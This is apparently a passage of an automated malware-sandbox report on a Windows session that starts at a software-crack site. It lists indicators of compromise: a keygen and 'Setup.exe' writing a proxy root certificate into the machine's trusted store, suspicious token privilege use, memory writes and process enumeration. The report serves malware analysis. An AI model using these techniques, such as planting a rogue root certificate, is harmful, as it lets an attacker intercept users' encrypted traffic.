3ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 6 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 5684 PING.EXE 5112 PING.EXE 4232 PING.EXE 4328 PING.EXE 4896 PING.EXE 2732 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeWerFault.exe1613217354205.exe1613217358815.exefile.exeD5EE.tmp.exe1613217364196.exeWerFault.exejfiag3g_gg.exemsiexec.exepid process 3876 chrome.exe 3876 chrome.exe 3812 chrome.exe 3812 chrome.exe 4796 chrome.exe 4796 chrome.exe 4744 chrome.exe 4744 chrome.exe 4812 chrome.exe 4812 chrome.exe 4652 chrome.exe 4652 chrome.exe 3532 chrome.exe 3532 chrome.exe 212 chrome.exe 212 chrome.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4100 1613217354205.exe 4100 1613217354205.exe 3640 1613217358815.exe 4120 file.exe 4120 file.exe 3640 1613217358815.exe 4640 D5EE.tmp.exe 4640 D5EE.tmp.exe 4120 file.exe 4120 file.exe 1064 1613217364196.exe 1064 1613217364196.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 1996 jfiag3g_gg.exe 1996 jfiag3g_gg.exe 1572 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
MicrosoftEdgeCP.exeseed.exeE8FA.exeFF52.exepid process 5356 MicrosoftEdgeCP.exe 3536 seed.exe 3940 E8FA.exe 4608 FF52.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 1660 msiexec.exe Token: SeIncreaseQuotaPrivilege 1660 msiexec.exe Token: SeSecurityPrivilege 1572 msiexec.exe Token: SeCreateTokenPrivilege 1660 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1660 msiexec.exe Token: SeLockMemoryPrivilege 1660 msiexec.exe Token: SeIncreaseQuotaPrivilege 1660 msiexec.exe Token: SeMachineAccountPrivilege 1660 msiexec.exe Token: SeTcbPrivilege 1660 msiexec.exe Token: SeSecurityPrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeLoadDriverPrivilege 1660 msiexec.exe Token: SeSystemProfilePrivilege 1660 msiexec.exe Token: SeSystemtimePrivilege 1660 msiexec.exe Token: SeProfSingleProcessPrivilege 1660 msiexec.exe Token: SeIncBasePriorityPrivilege 1660 msiexec.exe Token: SeCreatePagefilePrivilege 1660 msiexec.exe Token: SeCreatePermanentPrivilege 1660 msiexec.exe Token: SeBackupPrivilege 1660 msiexec.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeShutdownPrivilege 1660 msiexec.exe Token: SeDebugPrivilege 1660 msiexec.exe Token: SeAuditPrivilege 1660 msiexec.exe Token: SeSystemEnvironmentPrivilege 1660 msiexec.exe Token: SeChangeNotifyPrivilege 1660 msiexec.exe Token: SeRemoteShutdownPrivilege 1660 msiexec.exe Token: SeUndockPrivilege 1660 msiexec.exe Token: SeSyncAgentPrivilege 1660 msiexec.exe Token: SeEnableDelegationPrivilege 1660 msiexec.exe Token: SeManageVolumePrivilege 1660 msiexec.exe Token: SeImpersonatePrivilege 1660 msiexec.exe Token: SeCreateGlobalPrivilege 1660 msiexec.exe Token: SeCreateTokenPrivilege 1660 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1660 msiexec.exe Token: SeLockMemoryPrivilege 1660 msiexec.exe Token: SeIncreaseQuotaPrivilege 1660 msiexec.exe Token: SeMachineAccountPrivilege 1660 msiexec.exe Token: SeTcbPrivilege 1660 msiexec.exe Token: SeSecurityPrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeLoadDriverPrivilege 1660 msiexec.exe Token: SeSystemProfilePrivilege 1660 msiexec.exe Token: SeSystemtimePrivilege 1660 msiexec.exe Token: SeProfSingleProcessPrivilege 1660 msiexec.exe Token: SeIncBasePriorityPrivilege 1660 msiexec.exe Token: SeCreatePagefilePrivilege 1660 msiexec.exe Token: SeCreatePermanentPrivilege 1660 msiexec.exe Token: SeBackupPrivilege 1660 msiexec.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeShutdownPrivilege 1660 msiexec.exe Token: SeDebugPrivilege 1660 msiexec.exe Token: SeAuditPrivilege 1660 msiexec.exe Token: SeSystemEnvironmentPrivilege 1660 msiexec.exe Token: SeChangeNotifyPrivilege 1660 msiexec.exe Token: SeRemoteShutdownPrivilege 1660 msiexec.exe Token: SeUndockPrivilege 1660 msiexec.exe Token: SeSyncAgentPrivilege 1660 msiexec.exe Token: SeEnableDelegationPrivilege 1660 msiexec.exe Token: SeManageVolumePrivilege 1660 msiexec.exe Token: SeImpersonatePrivilege 1660 msiexec.exe Token: SeCreateGlobalPrivilege 1660 msiexec.exe Token: SeCreateTokenPrivilege 1660 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1660 msiexec.exe Token: SeLockMemoryPrivilege 1660 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exemsiexec.exechrome.exe23E04C4F32EF2158.tmppid process 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 1660 msiexec.exe 1660 msiexec.exe 1660 msiexec.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4360 23E04C4F32EF2158.tmp 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
chrome.exechrome.exepid process 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 3812 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe 4172 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4988 MicrosoftEdge.exe 5356 MicrosoftEdgeCP.exe 5356 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 3812 wrote to memory of 904 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 904 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3980 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3876 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 3876 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe PID 3812 wrote to memory of 2900 3812 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cracknet.net/1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff99ed26e00,0x7ff99ed26e10,0x7ff99ed26e202⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1476 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1648 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3960 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4480 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5416 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff71efa7740,0x7ff71efa7750,0x7ff71efa77603⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5076 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4400 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5844 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6108 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3280 /prefetch:82⤵
-
